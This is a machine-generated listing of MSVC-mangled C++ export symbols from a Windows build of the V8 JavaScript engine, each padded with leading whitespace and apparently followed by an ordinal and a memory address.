                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1270x140901af0
                                                                                                                                                                                                                                    ??$NewHeapNumber@$00@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1280x140b339c0
                                                                                                                                                                                                                                    ??$NewHeapNumber@$00@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1290x140b33a60
                                                                                                                                                                                                                                    ??$NewHeapNumber@$03@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1300x140b33b10
                                                                                                                                                                                                                                    ??$NewHeapNumber@$04@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1310x140b33bb0
                                                                                                                                                                                                                                    ??$NewHeapNumber@$0A@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1320x140b33c50
                                                                                                                                                                                                                                    ??$PrepareErrors@VIsolate@internal@v8@@@PendingCompilationErrorHandler@internal@v8@@QEAAXPEAVIsolate@12@PEAVAstValueFactory@12@@Z1330x1408b7fa0
                                                                                                                                                                                                                                    ??$PrepareErrors@VLocalIsolate@internal@v8@@@PendingCompilationErrorHandler@internal@v8@@QEAAXPEAVLocalIsolate@12@PEAVAstValueFactory@12@@Z1340x1408b8010
                                                                                                                                                                                                                                    ??$PrintCheckOperand@C@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@C@Z1350x140ff0000
                                                                                                                                                                                                                                    ??$PrintCheckOperand@D@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@D@Z1360x140ff0000
                                                                                                                                                                                                                                    ??$PrintCheckOperand@E@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@E@Z1370x140ff0020
                                                                                                                                                                                                                                    ??$PrintCheckOperand@H@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z1380x140ff0040
                                                                                                                                                                                                                                    ??$PrintCheckOperand@I@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I@Z1390x140ff0180
                                                                                                                                                                                                                                    ??$PrintCheckOperand@J@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@J@Z1400x140ff02c0
                                                                                                                                                                                                                                    ??$PrintCheckOperand@K@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@K@Z1410x140ff02e0
                                                                                                                                                                                                                                    ??$PrintCheckOperand@PEAC@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAC@Z1420x140ff0300
                                                                                                                                                                                                                                    ??$PrintCheckOperand@PEAD@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAD@Z1430x140ff0300
                                                                                                                                                                                                                                    ??$PrintCheckOperand@PEAE@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAE@Z1440x140ff0300
                                                                                                                                                                                                                                    ??$PrintCheckOperand@PEBC@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBC@Z1450x140ff0300
                                                                                                                                                                                                                                    ??$PrintCheckOperand@PEBD@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBD@Z1460x140ff0300
                                                                                                                                                                                                                                    ??$PrintCheckOperand@PEBE@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBE@Z1470x140ff0300
                                                                                                                                                                                                                                    ??$PrintCheckOperand@PEBX@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBX@Z1480x140ff0320
                                                                                                                                                                                                                                    ??$PrintCheckOperand@_J@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_J@Z1490x140ff0460
                                                                                                                                                                                                                                    ??$PrintCheckOperand@_K@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K@Z1500x140ff0480
                                                                                                                                                                                                                                    ??$ReadZigZag@H@ValueDeserializer@internal@v8@@AEAA?AV?$Maybe@H@2@XZ1510x1408c9a80
                                                                                                                                                                                                                                    ??$RegisterObjectWithInvalidatedSlots@$00@MemoryChunk@internal@v8@@QEAAXVHeapObject@12@@Z1520x140abb640
                                                                                                                                                                                                                                    ??$RegisterObjectWithInvalidatedSlots@$0A@@MemoryChunk@internal@v8@@QEAAXVHeapObject@12@@Z1530x140abb6e0
                                                                                                                                                                                                                                    ??$Rehash@VIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VOrderedNameDictionary@internal@v8@@@12@H@Z1540x1408f7440
                                                                                                                                                                                                                                    ??$Rehash@VIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@QEAAXPEAVIsolate@12@@Z1550x1408d7c90
                                                                                                                                                                                                                                    ??$Rehash@VIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@SA?AV?$Handle@VSwissNameDictionary@internal@v8@@@12@PEAVIsolate@12@V312@H@Z1560x1408d8100
                                                                                                                                                                                                                                    ??$Rehash@VLocalIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@QEAAXPEAVLocalIsolate@12@@Z1570x1408d83e0
                                                                                                                                                                                                                                    ??$Rehash@VLocalIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@SA?AV?$Handle@VSwissNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@H@Z1580x1408d8830
                                                                                                                                                                                                                                    ??$SetScriptScopeInfo@VIsolate@internal@v8@@@Scope@internal@v8@@SAXPEAVIsolate@12@PEAVDeclarationScope@12@@Z1590x140c61b30
                                                                                                                                                                                                                                    ??$SetScriptScopeInfo@VLocalIsolate@internal@v8@@@Scope@internal@v8@@SAXPEAVLocalIsolate@12@PEAVDeclarationScope@12@@Z1600x140c61b50
                                                                                                                                                                                                                                    ??$SignedDivisionByConstant@I@base@v8@@YA?AU?$MagicNumbersForDivision@I@01@I@Z1610x14129ff20
                                                                                                                                                                                                                                    ??$SignedDivisionByConstant@_K@base@v8@@YA?AU?$MagicNumbersForDivision@_K@01@_K@Z1620x1412a0020
                                                                                                                                                                                                                                    ??$Start@$00@LookupIterator@internal@v8@@AEAAXXZ1630x140932b30
                                                                                                                                                                                                                                    ??$Start@$0A@@LookupIterator@internal@v8@@AEAAXXZ1640x140932be0
                                                                                                                                                                                                                                    ??$TailCallBytecodeDispatch@V?$TNode@VObject@internal@v8@@@internal@v8@@V?$TNode@UIntPtrT@internal@v8@@@23@V?$TNode@VBytecodeArray@internal@v8@@@23@V?$TNode@VExternalReference@internal@v8@@@23@@CodeAssembler@compiler@internal@v8@@QEAAXAEBVCallInterfaceDescriptor@23@V?$TNode@URawPtrT@internal@v8@@@23@V?$TNode@VObject@internal@v8@@@23@V?$TNode@UIntPtrT@internal@v8@@@23@V?$TNode@VBytecodeArray@internal@v8@@@23@V?$TNode@VExternalReference@internal@v8@@@23@@Z1650x1410a5310
                                                                                                                                                                                                                                    ??$ToBytecodeArray@VIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVIsolate@23@@Z1660x140a58cd0
                                                                                                                                                                                                                                    ??$ToBytecodeArray@VIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVIsolate@23@HHV?$Handle@VByteArray@internal@v8@@@23@@Z1670x140a51ce0
                                                                                                                                                                                                                                    ??$ToBytecodeArray@VLocalIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVLocalIsolate@23@@Z1680x140a58d70
                                                                                                                                                                                                                                    ??$ToBytecodeArray@VLocalIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVLocalIsolate@23@HHV?$Handle@VByteArray@internal@v8@@@23@@Z1690x140a51dd0
                                                                                                                                                                                                                                    ??$ToFixedArray@VIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@PEAVIsolate@23@@Z1700x140a340f0
                                                                                                                                                                                                                                    ??$ToFixedArray@VLocalIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@PEAVLocalIsolate@23@@Z1710x140a34330
                                                                                                                                                                                                                                    ??$ToSourcePositionTable@VIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVIsolate@23@@Z1720x140a58e10
                                                                                                                                                                                                                                    ??$ToSourcePositionTable@VIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVIsolate@23@@Z1730x140a51ec0
                                                                                                                                                                                                                                    ??$ToSourcePositionTable@VIsolate@internal@v8@@@SourcePositionTableBuilder@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@12@PEAVIsolate@12@@Z1740x140bdbad0
                                                                                                                                                                                                                                    ??$ToSourcePositionTable@VLocalIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVLocalIsolate@23@@Z1750x140a58e30
                                                                                                                                                                                                                                    ??$ToSourcePositionTable@VLocalIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVLocalIsolate@23@@Z1760x140a51f00
                                                                                                                                                                                                                                    ??$ToSourcePositionTable@VLocalIsolate@internal@v8@@@SourcePositionTableBuilder@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@12@PEAVLocalIsolate@12@@Z1770x140bdbb50
                                                                                                                                                                                                                                    ??$TryToCopyAndConvertArrayToCppBuffer@$0CAAAA@H@v8@@YA_NV?$Local@VArray@v8@@@0@PEAHI@Z1780x140c755e0
                                                                                                                                                                                                                                    ??$TryToCopyAndConvertArrayToCppBuffer@$0DAAAA@I@v8@@YA_NV?$Local@VArray@v8@@@0@PEAII@Z1790x140c755e0
                                                                                                                                                                                                                                    ??$TryToCopyAndConvertArrayToCppBuffer@$0GAAAA@M@v8@@YA_NV?$Local@VArray@v8@@@0@PEAMI@Z1800x140c756f0
                                                                                                                                                                                                                                    ??$TryToCopyAndConvertArrayToCppBuffer@$0HAAAA@N@v8@@YA_NV?$Local@VArray@v8@@@0@PEANI@Z1810x140c75870
                                                                                                                                                                                                                                    ??$UnsignedDivisionByConstant@I@base@v8@@YA?AU?$MagicNumbersForDivision@I@01@II@Z1820x1412a0130
                                                                                                                                                                                                                                    ??$UnsignedDivisionByConstant@_K@base@v8@@YA?AU?$MagicNumbersForDivision@_K@01@_KI@Z1830x1412a0260
                                                                                                                                                                                                                                    ??$WriteBarrierForRange@VFullObjectSlot@internal@v8@@@Heap@internal@v8@@QEAAXVHeapObject@12@VFullObjectSlot@12@1@Z1840x140af9a60
                                                                                                                                                                                                                                    ??$WriteToFlat@E@String@internal@v8@@SAXV012@PEAEHH@Z1850x1408dae10
                                                                                                                                                                                                                                    ??$WriteToFlat@E@String@internal@v8@@SAXV012@PEAEHHVPtrComprCageBase@12@AEBVSharedStringAccessGuardIfNeeded@12@@Z1860x1408dae60
                                                                                                                                                                                                                                    ??$WriteToFlat@G@String@internal@v8@@SAXV012@PEAGHH@Z1870x1408db170
                                                                                                                                                                                                                                    ??$WriteToFlat@G@String@internal@v8@@SAXV012@PEAGHHVPtrComprCageBase@12@AEBVSharedStringAccessGuardIfNeeded@12@@Z1880x1408db1c0
                                                                                                                                                                                                                                    ??$WriteZigZag@H@ValueSerializer@internal@v8@@AEAAXH@Z1890x1408c9c60
                                                                                                                                                                                                                                    ??$vinstr@VYMMRegister@internal@v8@@V123@V123@@Assembler@internal@v8@@QEAAXEVYMMRegister@12@00W4SIMDPrefix@012@W4LeadingOpcode@012@W4VexW@012@W4CpuFeature@12@@Z1900x1405fd420
                                                                                                                                                                                                                                    ??$vinstr@VYMMRegister@internal@v8@@V123@VOperand@23@@Assembler@internal@v8@@QEAAXEVYMMRegister@12@0VOperand@12@W4SIMDPrefix@012@W4LeadingOpcode@012@W4VexW@012@W4CpuFeature@12@@Z1910x1405fd4e0
                                                                                                                                                                                                                                    ??$vinstr@VYMMRegister@internal@v8@@V123@VXMMRegister@23@@Assembler@internal@v8@@QEAAXEVYMMRegister@12@0VXMMRegister@12@W4SIMDPrefix@012@W4LeadingOpcode@012@W4VexW@012@W4CpuFeature@12@@Z1920x1405fd420
                                                                                                                                                                                                                                    ??$vinstr@VYMMRegister@internal@v8@@VXMMRegister@23@V423@@Assembler@internal@v8@@QEAAXEVYMMRegister@12@VXMMRegister@12@1W4SIMDPrefix@012@W4LeadingOpcode@012@W4VexW@012@W4CpuFeature@12@@Z1930x1405fd420
                                                                                                                                                                                                                                    ??$vinstr@VYMMRegister@internal@v8@@VXMMRegister@23@VOperand@23@@Assembler@internal@v8@@QEAAXEVYMMRegister@12@VXMMRegister@12@VOperand@12@W4SIMDPrefix@012@W4LeadingOpcode@012@W4VexW@012@W4CpuFeature@12@@Z1940x1405fd4e0
                                                                                                                                                                                                                                    ??0?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA@_K@Z1950x140097ad0
                                                                                                                                                                                                                                    ??0?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA@XZ1960x14010d5b0
                                                                                                                                                                                                                                    ??0?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA@_K@Z1970x140097ad0
                                                                                                                                                                                                                                    ??0?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA@XZ1980x14010d5b0
                                                                                                                                                                                                                                    ??0?$CanonicalHandleScopeForOptimization@VOptimizedCompilationInfo@internal@v8@@@internal@v8@@QEAA@PEAVIsolate@12@PEAVOptimizedCompilationInfo@12@@Z1990x140b4ae30
                                                                                                                                                                                                                                    ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$01$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@internal@v8@@QEAA@XZ2000x1400972c0
                                                                                                                                                                                                                                    ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$02$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$01$0A@@23@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@internal@v8@@QEAA@XZ2010x1400972c0
                                                                                                                                                                                                                                    ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$03$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$02$0A@@23@V?$PerThreadAssertScopeDebugOnly@$01$0A@@23@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@internal@v8@@QEAA@XZ2020x1400972c0
                                                                                                                                                                                                                                    ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$00@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$00@23@@internal@v8@@QEAA@XZ2030x1400972c0
                                                                                                                                                                                                                                    ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@internal@v8@@QEAA@XZ2040x1400972c0
                                                                                                                                                                                                                                    ??0?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAA@PEAVIsolate@12@V?$Vector@$$CBE@base@2@I_N2@Z2050x1407e8a40
                                                                                                                                                                                                                                    ??0?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAA@PEAVLocalIsolate@12@V?$Vector@$$CBE@base@2@I_N2@Z2060x1407e8c80
                                                                                                                                                                                                                                    ??0?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA@_K@Z2070x140097ad0
                                                                                                                                                                                                                                    ??0?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA@XZ2080x14010d5b0
                                                                                                                                                                                                                                    ??0?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA@_K@Z2090x140097ad0
                                                                                                                                                                                                                                    ??0?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA@XZ2100x14010d5b0
                                                                                                                                                                                                                                    ??0?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z2110x140097ad0
                                                                                                                                                                                                                                    ??0?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA@XZ2120x14010d5b0
                                                                                                                                                                                                                                    ??0?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z2130x140097ad0
                                                                                                                                                                                                                                    ??0?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA@XZ2140x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@IEAA@_K@Z2150x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAA@XZ2160x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z2170x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ2180x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA@_K@Z2190x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA@XZ2200x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA@_K@Z2210x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA@XZ2220x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@IEAA@_K@Z2230x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@QEAA@XZ2240x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z2250x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA@XZ2260x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@IEAA@_K@Z2270x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAA@XZ2280x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z2290x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ2300x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@IEAA@_K@Z2310x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@QEAA@XZ2320x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z2330x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA@XZ2340x14010d5b0
                                                                                                                                                                                                                                    ??0?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@IEAA@_K@Z2350x140097ad0
                                                                                                                                                                                                                                    ??0?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAA@XZ2360x14010d5b0
                                                                                                                                                                                                                                    ??0?$MagicNumbersForDivision@I@base@v8@@QEAA@II_N@Z2370x1412a03c0
                                                                                                                                                                                                                                    ??0?$MagicNumbersForDivision@_K@base@v8@@QEAA@_KI_N@Z2380x1412a03d0
                                                                                                                                                                                                                                    ??0?$MemorySpan@$$CBD@v8@@QEAA@PEBD_K@Z2390x140504370
                                                                                                                                                                                                                                    ??0?$MemorySpan@$$CBD@v8@@QEAA@XZ2400x140097c90
                                                                                                                                                                                                                                    ??0?$MemorySpan@$$CBE@v8@@QEAA@PEBE_K@Z2410x140504370
                                                                                                                                                                                                                                    ??0?$MemorySpan@$$CBE@v8@@QEAA@XZ2420x140097c90
                                                                                                                                                                                                                                    ??0?$MemorySpan@$$CBVCFunction@v8@@@v8@@QEAA@PEBVCFunction@1@_K@Z2430x140504370
                                                                                                                                                                                                                                    ??0?$MemorySpan@$$CBVCFunction@v8@@@v8@@QEAA@XZ2440x140097c90
                                                                                                                                                                                                                                    ??0?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z2450x140097ad0
                                                                                                                                                                                                                                    ??0?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ2460x14010d5b0
                                                                                                                                                                                                                                    ??0?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z2470x140097ad0
                                                                                                                                                                                                                                    ??0?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ2480x14010d5b0
                                                                                                                                                                                                                                    ??0?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAA@_K@Z2490x140097ad0
                                                                                                                                                                                                                                    ??0?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAA@XZ2500x14010d5b0
                                                                                                                                                                                                                                    ??0?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAA@_K@Z2510x140097ad0
                                                                                                                                                                                                                                    ??0?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAA@XZ2520x14010d5b0
                                                                                                                                                                                                                                    ??0?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@IEAA@_K@Z2530x140097ad0
                                                                                                                                                                                                                                    ??0?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAA@XZ2540x14010d5b0
                                                                                                                                                                                                                                    ??0?$ParserBase@VParser@internal@v8@@@internal@v8@@QEAA@PEAVZone@12@PEAVScanner@12@_KPEAVAstValueFactory@12@PEAVPendingCompilationErrorHandler@12@PEAVRuntimeCallStats@12@PEAVLogger@12@VUnoptimizedCompileFlags@12@_N@Z2550x14088c0c0
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$00$00@internal@v8@@QEAA@XZ2560x140bda520
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$00$0A@@internal@v8@@QEAA@XZ2570x140bda550
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$01$00@internal@v8@@QEAA@XZ2580x140bda580
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$01$0A@@internal@v8@@QEAA@XZ2590x140bda5b0
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$02$00@internal@v8@@QEAA@XZ2600x140bda5e0
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$02$0A@@internal@v8@@QEAA@XZ2610x140bda610
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$03$00@internal@v8@@QEAA@XZ2620x140bda640
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$03$0A@@internal@v8@@QEAA@XZ2630x140bda670
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$04$00@internal@v8@@QEAA@XZ2640x140bda6a0
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$04$0A@@internal@v8@@QEAA@XZ2650x140bda6d0
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$05$0A@@internal@v8@@QEAA@XZ2660x140bda700
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$0A@$00@internal@v8@@QEAA@XZ2670x140bda730
                                                                                                                                                                                                                                    ??0?$PerThreadAssertScope@$0A@$0A@@internal@v8@@QEAA@XZ2680x140bda760
                                                                                                                                                                                                                                    ??0?$SharedTurboAssemblerBase@VTurboAssembler@internal@v8@@@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z2690x140558ff0
                                                                                                                                                                                                                                    ??0?$SharedTurboAssemblerBase@VTurboAssembler@internal@v8@@@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z2700x140559050
                                                                                                                                                                                                                                    ??0?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2710x14057d2a0
                                                                                                                                                                                                                                    ??0?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2720x14057d2a0
                                                                                                                                                                                                                                    ??0?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2730x14057d2a0
                                                                                                                                                                                                                                    ??0?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2740x14057d2a0
                                                                                                                                                                                                                                    ??0?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2750x14057d2a0
                                                                                                                                                                                                                                    ??0?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2760x14057d2a0
                                                                                                                                                                                                                                    ??0?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@IEAA@_J@Z2770x140097ad0
                                                                                                                                                                                                                                    ??0?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@IEAA@_J@Z2780x140097ad0
                                                                                                                                                                                                                                    ??0?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@IEAA@_J@Z2790x140097ad0
                                                                                                                                                                                                                                    ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@AEBV012@@Z2800x14057d2e0
                                                                                                                                                                                                                                    ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@PEAVZone@12@@Z2810x14057d300
                                                                                                                                                                                                                                    ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@V?$initializer_list@PEAVMoveOperands@compiler@internal@v8@@@std@@PEAVZone@12@@Z2820x14057d320
                                                                                                                                                                                                                                    ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@_KPEAVMoveOperands@compiler@12@PEAVZone@12@@Z2830x14057d3b0
                                                                                                                                                                                                                                    ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@_KPEAVZone@12@@Z2840x14057d420
                                                                                                                                                                                                                                    ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ2850x1405365a0
